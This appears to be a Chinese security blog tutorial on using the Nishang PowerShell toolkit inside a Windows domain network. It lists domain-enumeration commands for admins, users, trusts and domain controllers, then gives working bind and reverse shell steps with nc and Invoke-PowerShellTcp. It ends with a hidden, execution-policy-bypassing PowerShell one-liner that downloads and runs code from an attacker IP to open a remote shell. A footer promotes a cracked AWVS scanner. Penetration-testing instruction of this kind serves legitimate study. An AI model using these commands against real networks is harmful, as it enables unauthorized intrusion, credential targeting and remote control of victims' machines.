内网神器-Nishang之信息收集篇(二)


域信息收集

查询域

net view /domain

内网神器-Nishang之信息收集篇(二)_第1张图片

查询域内计算机

net view /domain:nowsec

内网神器-Nishang之信息收集篇(二)_第2张图片

查询域内所有用户组列表

net group /domain

内网神器-Nishang之信息收集篇(二)_第3张图片

查询所有与成员计算机列表

net group "domain computers" /domain

内网神器-Nishang之信息收集篇(二)_第4张图片

获取域密码信息

net accounts /domain

内网神器-Nishang之信息收集篇(二)_第5张图片

获取域信任信息

nltest /domain_trusts

查找域控制器

nltest /DCLIST:nowsec

查看域控制器的主机名

nslookup -type=srv _ldap._tcp

内网神器-Nishang之信息收集篇(二)_第6张图片

查看当前时间

net time /domain

查看域控制器组

net group "Domain Controllers" /domain

内网神器-Nishang之信息收集篇(二)_第7张图片

查询所有域用户列表

net user /domain

内网神器-Nishang之信息收集篇(二)_第8张图片

获取域内账户详细信息

wmic useraccount get /all

内网神器-Nishang之信息收集篇(二)_第9张图片

查询本地管理员组用户

net localgroup administrators

内网神器-Nishang之信息收集篇(二)_第10张图片

查询域管理员用户

net group "domain admins" /domain

内网神器-Nishang之信息收集篇(二)_第11张图片

查询管理员用户组

net group "Enterprise admins" /domain

内网神器-Nishang之信息收集篇(二)_第12张图片

创建交互式shell

正向连接

目标机器执行命令监听2233端口

Invoke-PowerShellTcp -Bind -Port 2233

内网神器-Nishang之信息收集篇(二)_第13张图片
攻击机连接目标主机

sudo nc -nv 192.168.169.157 2233

内网神器-Nishang之信息收集篇(二)_第14张图片

反向连接

攻击机监听3322端口

sudo nc -lvp 3322


目标机器连接攻击机

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.169.129 -Port 3322


连接成功后即可在攻击机中看到shell界面
内网神器-Nishang之信息收集篇(二)_第15张图片

基于HTTP/HTTPS的powershell交互式shell

在攻击机执行以下命令

Invoke-PoshRatHttp -IPAddress 192.168.169.136 -Port 1234


在目标机器执行以下命令

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.169.136:1234/connect'))

执行结束后,查看攻击机界面会返回一个shell
内网神器-Nishang之信息收集篇(二)_第16张图片

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

你可能感兴趣的:(内网神器-Nishang之信息收集篇(二))